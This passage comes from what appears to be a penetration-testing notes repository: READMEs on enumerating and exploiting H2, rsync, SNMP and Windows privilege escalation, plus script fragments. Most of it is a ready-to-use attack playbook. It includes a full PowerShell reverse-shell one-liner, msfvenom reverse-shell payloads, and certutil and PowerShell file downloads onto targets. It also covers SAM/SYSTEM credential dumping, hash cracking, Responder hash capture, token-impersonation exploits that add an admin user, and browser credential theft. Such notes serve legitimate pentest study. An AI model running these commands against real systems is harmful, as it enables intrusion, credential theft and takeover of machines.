open("verified_domains.txt", mode="a") as verified_domains_file: 14 | verified_domains_file.write(domain_to_query + "\n") 15 | except Exception: 16 | pass 17 | 18 | 19 | print("Reading domain list...") 20 | with open("domains.txt", mode="r+") as domains_file: 21 | domains = domains_file.read().splitlines() 22 | print("Executing requests...") 23 | with ThreadPoolExecutor(max_workers=10) as executor: 24 | futures = [executor.submit(execute_request, domain) for domain in domains] 25 | results = [future.result() for future in as_completed(futures)] 26 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-8082-9092-h2/README.md: -------------------------------------------------------------------------------- 1 | # H2 enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to an H2 database](#connecting-to-an-h2-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 8082,9092 -sT --script=+h2* 9 | ``` 10 | 11 | ## Connecting to an H2 database 12 | - Connect to a database using `h2.jar`: 13 | ```bash 14 | java -cp h2*.jar org.h2.tools.Shell 15 | ``` 16 | 17 | ## Enumerating a database 18 | - Get version: 19 | ```SQL 20 | SELECT H2VERSION(); 21 | ``` 22 | - Get current database: 23 | ```SQL 24 | SELECT database(); 25 | ``` 26 | - Get current user: 27 | ```SQL 28 | SELECT current_user(); 29 | ``` 30 | - Get current user's password hash: 31 | ```SQL 32 | SELECT password FROM information_schema.users WHERE user_name=current_user(); -- Some databases still use password column 33 | ``` 34 | - List all users: 35 | ```SQL 36 | SELECT user FROM information_schema.users ORDER BY 1; 37 | ``` 38 | - Get default user's password hash: 39 | ```SQL 40 | SELECT password FROM information_schema.users WHERE user_name='sa'; -- Some databases still use password column 41 | ``` 42 | - List tables: 43 | ```SQL 44 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 45 | ``` 46 | - List table columns: 47 | ```SQL 48 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 49 | ``` 50 | - Search for `%user%` like tables: 51 | ```SQL 52 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0; 53 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-873-rsync/README.md: -------------------------------------------------------------------------------- 1 | # Rsync enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to and enumerating a share](#connecting-to-and-enumerating-a-share) 4 | * [Uploading files or folders](#uploading-files-or-folders) 5 | * [Post enumerating configuration files](#post-enumerating-configuration-files) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 873 -sT --script=+rsync* 10 | ``` 11 | 12 | ## Connecting to and enumerating a share 13 | - List share files: 14 | ```bash 15 | rsync -av --list-only rsync:/// # Anonymous 16 | rsync -av --list-only rsync://@/ 17 | ``` 18 | - Download all files: 19 | ```bash 20 | rsync -av rsync:/// ./ 21 | rsync -av rsync://@/ ./ 22 | ``` 23 | 24 | ## Uploading files or folders 25 | ```bash 26 | rsync -av rsync://// 27 | rsync -av rsync://@// 28 | ``` 29 | 30 | ## Post enumerating configuration files 31 | ```bash 32 | find / \( -name rsyncd.conf -o -name rsyncd.secrets \) 2>/dev/null 33 | ``` 34 | -------------------------------------------------------------------------------- /enum_and_exploit/udp-161-snmp/README.md: -------------------------------------------------------------------------------- 1 | # Simple Network Management Protocol _(SNMP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Community string brute-forcing](#community-string-brute-forcing) 4 | * [Collecting OIDs and values](#collecting-oids-and-values) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | sudo nmap -vv -p 161 -sU --script=+snmp* 9 | ``` 10 | 11 | ## Community string brute-forcing 12 | ```bash 13 | hydra -P /Users/kali/SecLists/Discovery/SNMP/common-snmp-community-strings.txt snmp 14 | ``` 15 | 16 | ## Collecting OIDs and values 17 | ```bash 18 | snmpwalk -v -c 19 | ``` 20 | -------------------------------------------------------------------------------- /enum_and_exploit/utils/README.md: -------------------------------------------------------------------------------- 1 | # Utilities 2 | * [Listening to reverse shell](#listening-to-reverse-shell) 3 | * [Cracking hashes](#cracking-hashes) 4 | * [Cracking encrypted files](#cracking-encrypted-files) 5 | * [Reading Microsoft Compound Files and Office documents](#reading-microsoft-compound-files-and-office-documents) 6 | * [Catching creds in incoming auth requests](#catching-creds-in-incoming-auth-requests) 7 | * [Certificates and keys](#certificates-and-keys) 8 | * [Base64 Encoding/Decoding](#base64-encodingdecoding) 9 | * [Beautify JSON](#beautify-json) 10 | * [Deblur images](#deblur-images) 11 | 12 | ## Listening to reverse shell 13 | ```bash 14 | ncat -l 443 -v 15 | ``` 16 | 17 | ## Cracking hashes 18 | - Identify hash type _(here are some hash examples: https://hashcat.net/wiki/doku.php?id=example_hashes)_: 19 | ```bash 20 | name-that-hash --text 21 | ``` 22 | - Crack a hash (John The Ripper): 23 | ```bash 24 | john ./hash --wordlist=/Users/kali/rockyou.txt 25 | john ./hash --format= --wordlist=/Users/kali/rockyou.txt 26 | john --show ./hash 27 | ``` 28 | - Crack a hash (Hashcat. Unreliable on Apple Silicon) 29 | ```bash 30 | hashcat -m -a 0 ./hash /Users/kali/rockyou.txt 31 | ``` 32 | 33 | ## Cracking encrypted files 34 | - Find `2john` converter for required file type: 35 | ```bash 36 | locate *2john* 37 | ``` 38 | - Generate a hash: 39 | ```bash 40 | <2john_converter> > hash 41 | ``` 42 | - Crack it: 43 | ```bash 44 | john ./hash --wordlist=/Users/kali/rockyou.txt 45 | ``` 46 | 47 | ## Reading Microsoft Compound Files and Office documents 48 | - Read using Apache OpenOffice. 49 | - Analyze files using oletools: https://github.com/decalage2/oletools 50 | 51 | ## Catching creds in incoming auth requests 52 | - Responder supports many different protocols. Default usage example: 53 | ```bash 54 | sudo responder -I tun0 55 | ``` 56 | 57 | ## Certificates and keys 58 | - Convert `.ppk` keys to `.pem` _(a text-based container using base-64 encoding)_ or `.key`: 59 | ```bash 60 | puttygen my.ppk -O private-openssh -o my.pem 61 | ``` 62 | - Generate a public key: 63 | ```bash 64 | puttygen my.ppk -O public-openssh -o my.pub 65 | puttygen my.ppk -O public -o my.pub 66 | ``` 67 | 68 | ## Base64 Encoding/Decoding 69 | - Encode: 70 | ```bash 71 | echo -n "STRING" | base64 72 | ``` 73 | - Decode: 74 | ```bash 75 | echo -n "STRING" | base64 --decode 76 | ``` 77 | 78 | ## Beautify JSON 79 | ```bash 80 | cat some_json_file.json | jq 81 | ``` 82 | 83 | ## Deblur images 84 | - Extract from pdf is necessary: https://tools.pdf24.org/en/extract-images 85 | - Try to deblur an image using [Depix](https://github.com/spipm/Depix): 86 | ```bash 87 | python3 /Users/kali/depix/depix.py \ 88 | -p .png \ 89 | -s /Users/kali/depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png # Or try to play with other options in images folder 90 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/windows/README.md: -------------------------------------------------------------------------------- 1 | # Windows privilege escalation 2 | * [Utilities](#utilities) 3 | * [Shell stabilization and interactivity](#shell-stabilization-and-interactivity) 4 | * [Useful reverse shells](#useful-reverse-shells) 5 | * [RDP connection](#rdp-connection) 6 | * [Port forwarding _(Plink)_](#port-forwarding-plink) 7 | * [Copy files from/to the target](#copy-files-fromto-the-target) 8 | * [Autoenumeration _(WinPEAS)_](#autoenumeration-winpeas) 9 | * [Autoenumeration _(SharpUp)_](#autoenumeration-sharpup) 10 | * [Autoenumeration _(Seatbelt)_](#autoenumeration-seatbelt) 11 | * [Effective permissions listing _(AccessChk)_](#effective-permissions-listing-accesschk) 12 | * [Processes monitoring _(ProcMon)_](#processes-monitoring-procmon) 13 | * [Windows exploit suggester](#windows-exploit-suggester) 14 | * [Manual enumeration](#manual-enumeration) 15 | * [System](#system) 16 | * [Users and groups](#users-and-groups) 17 | * [Apps, tasks, and services](#apps-tasks-and-services) 18 | * [Network](#network) 19 | * [Registries](#registries) 20 | * [Files and folders](#files-and-folders) 21 | * [Kernel exploits](#kernel-exploits) 22 | * [Permissions modification](#permissions-modification) 23 | * [Switching users in console](#switching-users-in-console) 24 | * [Catching Net-NTLMv2 hashes](#catching-net-ntlmv2-hashes) 25 | * [NBNS spoofing and NTLM relay _(HotPotato)_](#nbns-spoofing-and-ntlm-relay-hotpotato) 26 | * [Exploiting `AlwaysInstallElevated`](#exploiting-alwaysinstallelevated) 27 | * [Unquoted service path or service executable modification](#unquoted-service-path-or-service-executable-modification) 28 | * [Service binpath modification](#service-binpath-modification) 29 | * [Service registry modification](#service-registry-modification) 30 | * [DLL hijacking](#dll-hijacking) 31 | * [Parsing `SAM` and `SYSTEM` backups](#parsing-sam-and-system-backups) 32 | * [Using given privileges](#using-given-privileges) 33 | * [Token impersonation _(RoguePotato)_](#token-impersonation-roguepotato) 34 | * [Token impersonation _(PrintSpoofer)_](#token-impersonation-printspoofer) 35 | * [Token impersonation _(JuicyPotato)_](#token-impersonation-juicypotato) 36 | * [Token impersonation _(Incognito)_](#token-impersonation-incognito) 37 | * [Retrieving browser files _(SharpWeb)_](#retrieving-browser-files-sharpweb) 38 | * [Meterpreter's getsystem exploit](#meterpreters-getsystem-exploit) 39 | 40 | ## Utilities 41 | ### Shell stabilization and interactivity 42 | - Listen to reverse shell: 43 | ```bash 44 | ncat -l 443 -v 45 | ``` 46 | 47 | ### Useful reverse shells 48 | - Powershell oneliner: 49 | ```cmd 50 | powershell -c "$client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 51 | ``` 52 | - Base64 encoded powershell oneliner: 53 | ```bash 54 | 55 | wget https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py 56 | python3 mkpsrevshell.py 443 57 | ``` 58 | - TCP reverse shell executable: 59 | ```bash 60 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 61 | ``` 62 | - Via SMB: 63 | ```bash 64 | psexec.py ':@' 65 | wmiexec.py ':@' 66 | winexe -U '%' // cmd.exe 67 | pth-winexe -U '%:' // cmd.exe 68 | ``` 69 | - Via WinRM: 70 | ```bash 71 | evil-winrm -i -u -p 72 | evil-winrm -i -u -H 73 | ``` 74 | 75 | ### RDP connection 76 | ```bash 77 | xfreerdp +clipboard /w:1280 /h:720 /smart-sizing /cert:ignore /v: /u: /p:'' 78 | ``` 79 | 80 | ### Port forwarding _(Plink)_ 81 | - Prepare: 82 | ```bash 83 | cp ~/pentesting-tools/plink/plink64.exe ./plink.exe 84 | ``` 85 | - [Copy to the target](#copy-files-fromto-the-target) 86 | - Forward the blocked port: 87 | ```cmd 88 | .\plink.exe root@ -R :127.0.0.1: 89 | ``` 90 | 91 | ### Copy files from/to the target 92 | - SMB: 93 | ```bash 94 | sudo smbserver.py -smb2support share . 95 | ``` 96 | ```cmd 97 | copy \\\share 98 | copy \\\share\ . 99 | ``` 100 | - SMB _(simply execute the file)_: 101 | ```bash 102 | sudo smbserver.py -smb2support share . 103 | ``` 104 | ```cmd 105 | \\\share\ 106 | ``` 107 | - SCP: 108 | ```bash 109 | scp @: . 110 | scp @: 111 | ``` 112 | - FTP: 113 | ```bash 114 | python3 -m pyftpdlib -w -p 2121 115 | ``` 116 | ```cmd 117 | ftp # anonymous user and empty password 118 | open 2121 119 | put 120 | ``` 121 | - HTTP: 122 | ```bash 123 | sudo python3 -m http.server 80 124 | ``` 125 | ```cmd 126 | certutil -urlcache -split -f "http:///" 127 | powershell -c "(New-Object System.Net.WebClient).DownloadFile(\"http:///\", \"\")" 128 | ``` 129 | 130 | ## Autoenumeration _(WinPEAS)_ 131 | - Prepare: 132 | ```bash 133 | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -O ./winpeas.exe 134 | 135 | cp ~/pentesting-tools/winpeas/winPEASany.exe ./winpeas.exe # Or my stored version 136 | ``` 137 | - [Copy to the target](#copy-files-fromto-the-target) 138 | - Run: 139 | ```cmd 140 | .\winpeas.exe 141 | ``` 142 | 143 | ## Autoenumeration _(SharpUp)_ 144 | - Prepare: 145 | ```bash 146 | cp ~/pentesting-tools/sharpup/SharpUp.exe ./sharpup.exe 147 | ``` 148 | - [Copy to the target](#copy-files-fromto-the-target) 149 | - Run: 150 | ```cmd 151 | .\sharpup.exe 152 | ``` 153 | 154 | ## Autoenumeration _(Seatbelt)_ 155 | - Prepare: 156 | ```bash 157 | cp ~/pentesting-tools/seatbelt/Seatbelt.exe ./seatbelt.exe 158 | ``` 159 | - [Copy to the target](#copy-files-fromto-the-target) 160 | - Run: 161 | ```cmd 162 | .\seatbelt.exe -group=all 163 | ``` 164 | 165 | ## Effective permissions listing _(AccessChk)_ 166 | - Prepare: 167 | ```bash 168 | cp ~/pentesting-tools/accesschk/accesschk.exe ./accesschk.exe 169 | ``` 170 | - [Copy to the target](#copy-files-fromto-the-target) 171 | - List service permissions: 172 | ```cmd 173 | .\accesschk.exe /accepteula -ucqv 174 | ``` 175 | - List registry permissions: 176 | ```cmd 177 | .\accesschk.exe /accepteula -uvwdk "" 178 | ``` 179 | - List file permissions: 180 | ```cmd 181 | .\accesschk.exe /accepteula -quvw "C:\" 182 | ``` 183 | - List directory permissions: 184 | ```cmd 185 | .\accesschk.exe /accepteula -uwdq "C:\" 186 | ``` 187 | 188 | ## Processes monitoring _(ProcMon)_ 189 | - Prepare: 190 | ```bash 191 | cp ~/pentesting-tools/procmon/Procmon64.exe ./procmon.exe 192 | ``` 193 | - [Copy to the target](#copy-files-fromto-the-target) 194 | - Run _(running as administrator required)_: 195 | ``` 196 | .\procmon.exe 197 | ``` 198 | - Search for a DLL not found by a system process: 199 | ``` 200 | Result is NAME NOT FOUND 201 | User is NT AUTHORITY\SYSTEM 202 | Path ends with dll 203 | ``` 204 | 205 | ## Windows exploit suggester 206 | - System info _(save output into the `systeminfo.txt` file on Kali)_: 207 | ```cmd 208 | systeminfo 209 | wmic qfe 210 | ``` 211 | - Run Exploit Suggester: 212 | ```bash 213 | wes --update 214 | wes systeminfo.txt --definitions ./definitions.zip -i "Elevation of Privilege" --exploits-only 215 | ``` 216 | 217 | ## Manual enumeration 218 | ### System 219 | - System info: 220 | ```cmd 221 | systeminfo 222 | wmic os 223 | wmic os get osarchitecture 224 | wmic qfe 225 | powershell -c "Get-ComputerInfo" 226 | powershell -c "[System.Environment]::OSVersion" 227 | powershell -c "Get-Hotfix -description \"Security update\"" 228 | powershell -c "Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid}" 229 | ``` 230 | - Environment variables: 231 | ```cmd 232 | set 233 | powershell -c "Get-ChildItem Env: | ft Key,Value" 234 | ``` 235 | 236 | ### Users and groups 237 | - Current user: 238 | ```cmd 239 | whoami 240 | echo %USERNAME% 241 | powershell -c "$env:username" 242 | net user %USERNAME% 243 | whoami /priv 244 | whoami /groups 245 | ``` 246 | - Other users: 247 | ```cmd 248 | net user 249 | powershell -c "Get-LocalUser | ft Name,Enabled,LastLogon" 250 | ``` 251 | - Groups: 252 | ```cmd 253 | net localgroup 254 | powershell -c "Get-LocalGroup | ft Name" 255 | net localgroup Administrators 256 | powershell -c "Get-LocalGroupMember Administrators | ft Name, PrincipalSource" 257 | ``` 258 | - Stored credentials: 259 | ```cmd 260 | cmdkey /list 261 | ``` 262 | 263 | ### Apps, tasks, and services 264 | - List services: 265 | ```cmd 266 | net start 267 | wmic service list brief 268 | sc query 269 | powershell -c "Get-Service" 270 | tasklist /SVC 271 | ``` 272 | - Get service info: 273 | ```cmd 274 | sc qc 275 | sc query 276 | ``` 277 | - List tasks: 278 | ```cmd 279 | tasklist /v 280 | tasklist /v /fi "username eq system" 281 | tasklist /v | findstr /si "system admin" 282 | powershell -c "Get-Process" 283 | ``` 284 | - List schedules tasks: 285 | ```cmd 286 | schtasks /query /fo LIST 2>nul | findstr TaskName 287 | powershell -c "Get-ScheduledTask" 288 | powershell -c "Get-ScheduledTask | where {$_.TaskPath -notlike \"\Microsoft*\"}" 289 | ``` 290 | - List startup tasks: 291 | ```cmd 292 | wmic startup get caption,command 293 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 294 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 295 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 296 | dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 297 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 298 | ``` 299 | - List installed programs: 300 | ```cmd 301 | reg query "HKLM\SOFTWARE" 302 | reg query "HKCU\SOFTWARE" 303 | dir /a "C:\Program Files" 304 | dir /a "C:\Program Files (x86)" 305 | ``` 306 | 307 | ### Network 308 | - General info: 309 | ```cmd 310 | hostname 311 | ipconfig 312 | ipconfig /all 313 | ``` 314 | - List ports: 315 | ```cmd 316 | netstat -ano 317 | ``` 318 | - List shares: 319 | ```cmd 320 | net share 321 | powershell -c "Find-DomainShare -ComputerDomain domain.local" 322 | ``` 323 | 324 | ### Registries 325 | - List registries: 326 | ```cmd 327 | reg query "HKLM" 328 | reg query "HKCU" 329 | ``` 330 | - `AlwaysInstallElevated` _(both should be set to 1 for the exploit to work)_: 331 | ```cmd 332 | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" 333 | reg query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" 334 | ``` 335 | - Common registries with stored passwords: 336 | ```cmd 337 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" 338 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 339 | reg query "HKCU\Software\ORL\WinVNC3\Password" 340 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 341 | ``` 342 | - Search for passwords in registries _(too much output, better check registries known for storing passwords)_: 343 | ```cmd 344 | reg query HKLM /f pass /t REG_SZ /s 345 | reg query HKCU /f pass /t REG_SZ /s 346 | reg query HKLM /f passwd /t REG_SZ /s 347 | reg query HKCU /f passwd /t REG_SZ /s 348 | reg query HKLM /f password /t REG_SZ /s 349 | reg query HKCU /f password /t REG_SZ /s 350 | ``` 351 | 352 | ### Files and folders 353 | - List drives: 354 | ```cmd 355 | wmic logicaldisk get caption,description,providername 356 | powershell -c "Get-PSDrive | where {$_.Provider -like \"Microsoft.PowerShell.Core\FileSystem\"}| ft Name,Root" 357 | powershell -c "Get-PSDrive -PsProvider FileSystem" 358 | ``` 359 | - File or directory permissions: 360 | ```cmd 361 | icacls "C:\" 362 | ``` 363 | - List files in common folders: 364 | ```cmd 365 | dir /a C:\ 366 | dir /a "C:\Temp" 367 | dir /a "C:\Users" 368 | dir /a "C:\Users\%username%" 369 | dir /a "C:\Users\%username%\Desktop" 370 | dir /a "C:\Users\%username%\Downloads" 371 | dir /a "C:\Users\%username%\Documents" 372 | dir /a "C:\Users\%username%\AppData\" 373 | dir /a "C:\Users\%username%\AppData\Local" 374 | dir /a "C:\Users\%username%\AppData\LocalLow" 375 | dir /a "C:\Users\%username%\AppData\Roaming" 376 | dir /a "C:\Users\%username%\AppData\Local\Temp" 377 | ``` 378 | - Common files and registries having stored passwords: 379 | ```cmd 380 | icacls %SYSTEMROOT%\repair\SAM 381 | icacls %SYSTEMROOT%\System32\config\RegBack\SAM 382 | icacls %SYSTEMROOT%\System32\config\SAM 383 | icacls %SYSTEMROOT%\repair\system 384 | icacls %SYSTEMROOT%\System32\config\SYSTEM 385 | icacls %SYSTEMROOT%\System32\config\RegBack\system 386 | ``` 387 | - Search for files that often store passwords: 388 | ```cmd 389 | dir /s/b "C:\*sysprep.inf" "C:\*sysprep.xml" "C:\*unattend.xml" "C:\*web.config" 2>nul 390 | ``` 391 | - Search for passwords in common config files: 392 | ```cmd 393 | powershell -c "Get-ChildItem -Path C:\ -Filter unattend.xml -Recurse -Depth 3 -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 394 | powershell -c "Get-ChildItem -Path C:\ -Filter sysprep -Recurse -Depth 3 -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 395 | powershell -c "Get-ChildItem -Path C:\ -Filter web.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 396 | ``` 397 | - Search for passwords in files in the current directory: 398 | ```cmd 399 | findstr /spin password *.config *.xml *.ini *.txt 400 | ``` 401 | 402 | ## Kernel exploits 403 | - List of precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits 404 | 405 | ## Permissions modification 406 | - If the file or folder is owned by me, I can get all permissions for it: 407 | ```cmd 408 | icacls "C:\" /grant :(F) 409 | ``` 410 | 411 | ## Switching users in console 412 | - Prepare the reverse shell: 413 | ```bash 414 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 415 | ``` 416 | - [Copy to the target](#copy-files-fromto-the-target) 417 | - Run: 418 | ```cmd 419 | runas /user: .\shell.exe 420 | ``` 421 | - Run with stored credentials _(or if password for user is not required)_: 422 | ```cmd 423 | runas /savecred /user: .\shell.exe 424 | ``` 425 | 426 | ## Catching Net-NTLMv2 hashes 427 | - Prepare the responder: 428 | ```bash 429 | sudo responder -I tun0 430 | ``` 431 | - Connect to the share from target: 432 | ```cmd 433 | ///share/anything 434 | ``` 435 | - Crack the hash: 436 | ```bash 437 | echo '' > hash 438 | hashcat -m 5600 -a 0 ./hash /Users/kali/rockyou.txt 439 | ``` 440 | 441 | ## NBNS spoofing and NTLM relay _(HotPotato)_ 442 | - Prepare the exploit and the reverse shell: 443 | ```bash 444 | cp ~/pentesting-tools/hotpotato/Potato.exe ./potato.exe 445 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 446 | ``` 447 | - [Copy to the target](#copy-files-fromto-the-target) 448 | - Run it on Windows 7: 449 | ```cmd 450 | .\potato.exe -ip -disable_exhaust true -disable_defender true -cmd "\shell.exe" 451 | ``` 452 | - Run it on Windows Server 2008: 453 | ```cmd 454 | .\potato.exe -ip -disable_exhaust true -disable_defender true --spoof_host WPAD.EMC.LOCAL -cmd "\shell.exe" 455 | ``` 456 | 457 | ## Exploiting `AlwaysInstallElevated` 458 | - Prepare the reverse shell: 459 | ```bash 460 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f msi > shell.msi 461 | ``` 462 | - [Copy to the target](#copy-files-fromto-the-target) 463 | - Run: 464 | ```cmd 465 | msiexec /quite /qn /i shell.msi 466 | ``` 467 | 468 | ## Unquoted service path or service executable modification 469 | - Prepare the reverse shell: 470 | ```bash 471 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 472 | ``` 473 | - [Copy to the target](#copy-files-fromto-the-target) 474 | - Stop/Start service: 475 | ```cmd 476 | sc stop 477 | sc start 478 | 479 | net stop 480 | net start 481 | ``` 482 | 483 | ## Service binpath modification 484 | - Prepare the reverse shell: 485 | ```bash 486 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 487 | ``` 488 | - [Copy to the target](#copy-files-fromto-the-target) 489 | - Modify service binpath: 490 | ```cmd 491 | sc config binpath= "\"C:\Users\\AppData\Local\Temp\shell.exe\"" 492 | ``` 493 | - Stop/Start service 494 | ```cmd 495 | sc stop 496 | sc start 497 | 498 | net stop 499 | net start 500 | ``` 501 | 502 | ## Service registry modification 503 | - Prepare the reverse shell: 504 | ```bash 505 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 506 | ``` 507 | - [Copy to the target](#copy-files-fromto-the-target) 508 | - Modify the registry: 509 | ```cmd 510 | reg add "" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\\AppData\Local\Temp\shell.exe" /f 511 | ``` 512 | - Stop/Start service 513 | ```cmd 514 | sc stop 515 | sc start 516 | 517 | net stop 518 | net start 519 | ``` 520 | 521 | ## DLL hijacking 522 | - Prepare the reverse shell: 523 | ```bash 524 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f dll -o shell.dll 525 | ``` 526 | - [Copy to the target](#copy-files-fromto-the-target) and put instead of the missing DLL. 527 | 528 | ## Parsing `SAM` and `SYSTEM` backups 529 | - Run SMB server on Kali: 530 | ```bash 531 | sudo smbserver.py share . 532 | ``` 533 | - Copy files from Windows target. 534 | - Download `creddump7` in Kali: 535 | ```bash 536 | cp -r ~/pentesting-tools/creddump7 ./creddump7 537 | ``` 538 | - Extract cached credentials: 539 | ```bash 540 | # The output should look something like: 541 | # admin:1004:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: 542 | # where a9fdfa038c4b75ebc76dc855dd74f0da is the password hash 543 | python2 ./creddump7/pwdump.py ./SYSTEM ./SAM 544 | ``` 545 | - Crack the hash _(or you can run `pth-winexe` or `evil-winrm` shell using hash only)_: 546 | ```bash 547 | hashcat -m 1000 --force /Users/kali/rockyou.txt 548 | ``` 549 | 550 | ## Using given privileges 551 | - `SeBackupPrivilege` grants read access to all files regardless of their ACL. 552 | - `SeRestorePrivilege` grants write access to all files regardless of their ACL. 553 | - `SeTakeOwnershipPrivilege` allows to take the ownership of files. Give user full permissions to the file/folder: 554 | ```cmd 555 | icacls "" /q /c /t /grant :F 556 | ``` 557 | 558 | ## Token impersonation _(RoguePotato)_ 559 | - Works with `SeImpersonatePrivilege` or/and `SeAssignPrimaryTokenPrivilege` enabled. 560 | - Prepare the exploit and the reverse shell: 561 | ```bash 562 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 563 | cp ~/pentesting-tools/roguepotato/RoguePotato.exe ./roguepotato.exe 564 | ``` 565 | - [Copy to the target](#copy-files-fromto-the-target) 566 | - Run socat port redirection on Kali _(choose another port if 9999 is in use on the target)_: 567 | ```bash 568 | sudo socat tcp-listen:135,reuseaddr,fork tcp::9999 569 | ``` 570 | - Run exploit: 571 | ```cmd 572 | .\roguepotato.exe -r -l 9999 -e .\shell.exe 573 | ``` 574 | 575 | ## Token impersonation _(PrintSpoofer)_ 576 | - Works with `SeImpersonatePrivilege` enabled. 577 | - Prepare: 578 | ```bash 579 | cp ~/pentesting-tools/printspoofer/PrintSpoofer64.exe ./printspoofer.exe 580 | ``` 581 | - [Copy to the target](#copy-files-fromto-the-target) 582 | - Run: 583 | ```cmd 584 | .\printspoofer.exe -i -c powershell.exe 585 | ``` 586 | 587 | ## Token impersonation _(JuicyPotato)_ 588 | - Works with `SeImpersonatePrivilege` or/and `SeAssignPrimaryTokenPrivilege` enabled _(use RoguePotato or PrintSpoofer on the latest Windows versions)_. 589 | - Prepare: 590 | ```bash 591 | cp ~/pentesting-tools/juicypotato/JuicyPotato.exe ./juicypotato.exe 592 | cp ~/pentesting-tools/juicypotato/JuicyPotato86.exe ./juicypotato.exe # X86 version 593 | 594 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 595 | ``` 596 | - [Copy to the target](#copy-files-fromto-the-target) 597 | - Choose CLSID _(https://github.com/ohpe/juicy-potato/tree/master/CLSID)_. 598 | - Run: 599 | ```cmd 600 | .\juicypotato.exe -l 1337 -p .\shell.exe -t * -c 601 | ``` 602 | 603 | ## Token impersonation _(Incognito)_ 604 | - Works with `SeImpersonatePrivilege` and `SeDebugPrivilege` enabled _(use RoguePotato or PrintSpoofer on the latest Windows versions)_. 605 | - Prepare: 606 | ```bash 607 | cp ~/pentesting-tools/incognito/incognito.exe ./incognito.exe 608 | ``` 609 | - [Copy to the target](#copy-files-fromto-the-target) 610 | - Add privesc user with admin rights: 611 | ```cmd 612 | .\incognito.exe add_user privesc 123456 613 | .\incognito.exe add_localgroup_user Administrators privesc 614 | ``` 615 | 616 | ## Retrieving browser files _(SharpWeb)_ 617 | - Prepare: 618 | ```bash 619 | cp ~/pentesting-tools/sharpweb/SharpWeb.exe ./sharpweb.exe 620 | ``` 621 | - [Copy to the target](#copy-files-fromto-the-target) 622 | - Run: 623 | ```cmd 624 | .\sharpweb.exe all 625 | ``` 626 | 627 | ## Meterpreter's getsystem exploit 628 | - This tool requires your user to be a local admin or to have `SeDebugPrivilege` _(x86 only)_. 629 | - Prepare the meterpreter shell: 630 | ```bash 631 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 632 | ``` 633 | - [Copy to the target](#copy-files-fromto-the-target) 634 | - Listen to the reverse shell: 635 | ```bash 636 | msfconsole -q 637 | use exploit/multi/handler 638 | set payload windows/x64/meterpreter/reverse_tcp 639 | set lhost 640 | set lport 443 641 | run 642 | ``` 643 | - Run shell: 644 | ```cmd 645 | .\shell.exe 646 | ``` 647 | - Privesc using metasploit: 648 | ```bash 649 | use priv 650 | getsystem 651 | ``` 652 | -------------------------------------------------------------------------------- /toc_generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse 3 | import logging 4 | import os 5 | import re 6 | 7 | USAGE = "python3 toc_generator.py" 8 | DESCRIPTION = """\ 9 | Generates tables of contents for markdown files in the current folder. \ 10 | Add regex patterns for files the script should ignore to the .tocignore file in the current folder. 11 | """ 12 | 13 | IGNORE_FILE_NAME = ".tocignore" 14 | 